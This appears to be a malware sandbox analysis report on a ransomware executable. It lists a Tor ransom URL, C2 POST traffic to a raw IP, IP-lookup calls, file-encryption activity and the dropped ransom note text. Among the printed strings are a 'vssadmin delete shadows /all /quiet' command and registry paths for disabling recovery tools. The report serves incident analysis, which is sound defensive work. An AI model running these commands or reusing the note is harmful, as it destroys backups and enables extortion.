Source: RECOVERY INFO.txt42.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt135.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt174.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt75.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt54.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt245.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt131.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt26.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt67.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt157.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt299.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt18.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt266.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt87.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt139.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt222.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt72.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt228.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt129.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt265.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt182.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt85.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt133.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt59.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt19.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt288.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt150.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt262.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt225.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt186.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt185.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49737
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49772
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Host: api.ipify.org
Source: global trafficHTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=------------------------PARZD3yTWAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Content-Length: 1892Host: 193.143.1.139
Source: global trafficHTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=------------------------fsYLw7JdOAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Content-Length: 1899Host: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\3D003UC5\RECOVERY INFO.txtJump to behavior
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Host: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownHTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=------------------------PARZD3yTWAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Content-Length: 1892Host: 193.143.1.139
Source: 2b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820510829.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827950839.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828495183.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1823027740.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.139/
Source: 2b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832275770.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833404082.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829943691.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1831719140.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830337644.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832820189.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830881739.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830557344.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833273656.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.139/9U6
Source: 2b7cu0KwZl.exeString found in binary or memory: http://193.143.1.139/Ujdu8jjooue/biweax.php
Source: 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820510829.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.139/Ujdu8jjooue/biweax.php1
Source: 2b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832275770.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833404082.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829943691.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1831719140.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830337644.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832820189.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830881739.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830557344.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833273656.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.139/Ujdu8jjooue/biweax.php1y6
Source: 2b7cu0KwZl.exeString found in binary or memory: http://api.ipify.org
Source: 2b7cu0KwZl.exe, 00000000.00000003.1805381540.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1804619437.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1805035456.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1819160509.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1808182808.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1808323206.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: 2b7cu0KwZl.exe, 00000000.00000003.1817076512.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822753296.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1804503862.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1819426905.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822334255.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1805117359.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/6
Source: 2b7cu0KwZl.exeString found in binary or memory: http://api.ipify.orgunknown------------------------multipart/form-data;
Source: 2b7cu0KwZl.exe, 00000000.00000003.1852408139.000001F7CBE26000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1852516311.000001F7CA886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl
Source: 2b7cu0KwZl.exe, 00000000.00000003.1852408139.000001F7CBE26000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1852516311.000001F7CA886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d
Source: RECOVERY INFO.txt62.0.dr, RECOVERY INFO.txt283.0.dr, RECOVERY INFO.txt37.0.dr, RECOVERY INFO.txt10.0.dr, RECOVERY INFO.txt196.0.dr, RECOVERY INFO.txt304.0.dr, RECOVERY INFO.txt153.0.dr, RECOVERY INFO.txt89.0.dr, RECOVERY INFO.txt257.0.dr, RECOVERY INFO.txt155.0.dr, RECOVERY INFO.txt56.0.dr, RECOVERY INFO.txt52.0.dr, RECOVERY INFO.txt275.0.dr, RECOVERY INFO.txt115.0.dr, RECOVERY INFO.txt253.0.dr, RECOVERY INFO.txt106.0.dr, RECOVERY INFO.txt17.0.dr, RECOVERY INFO.txt111.0.dr, RECOVERY INFO.txt46.0.dr, RECOVERY INFO.txt66.0.dr, RECOVERY INFO.txt42.0.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO

Spam, unwanted Advertisements and Ransom Demands

barindex
Deletes shadow drive data (may be related to ransomware)
Source: 2b7cu0KwZl.exe, 00000000.00000000.1791805543.00007FF6882F3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: SeTakeOwnershipPrivilegeSeDebugPrivilegePowrProf.dllPowerSetActiveScheme\sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exep
Source: 2b7cu0KwZl.exeBinary or memory string: SeTakeOwnershipPrivilegeSeDebugPrivilegePowrProf.dllPowerSetActiveScheme\sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exep
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile moved: C:\Users\user\Desktop\ZBEDCJPBEY.xlsxJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile deleted: C:\Users\user\Desktop\ZBEDCJPBEY.xlsxJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile moved: C:\Users\user\Desktop\YPSIACHYXW\NIKHQAIQAU.pngJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile deleted: C:\Users\user\Desktop\YPSIACHYXW\NIKHQAIQAU.pngJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile moved: C:\Users\user\Desktop\VAMYDFPUND.mp3Jump to behavior
Writes a notice file (html or txt) to demand a ransom
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-cn\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pt-br\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pl-pl\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)Jump to dropped file
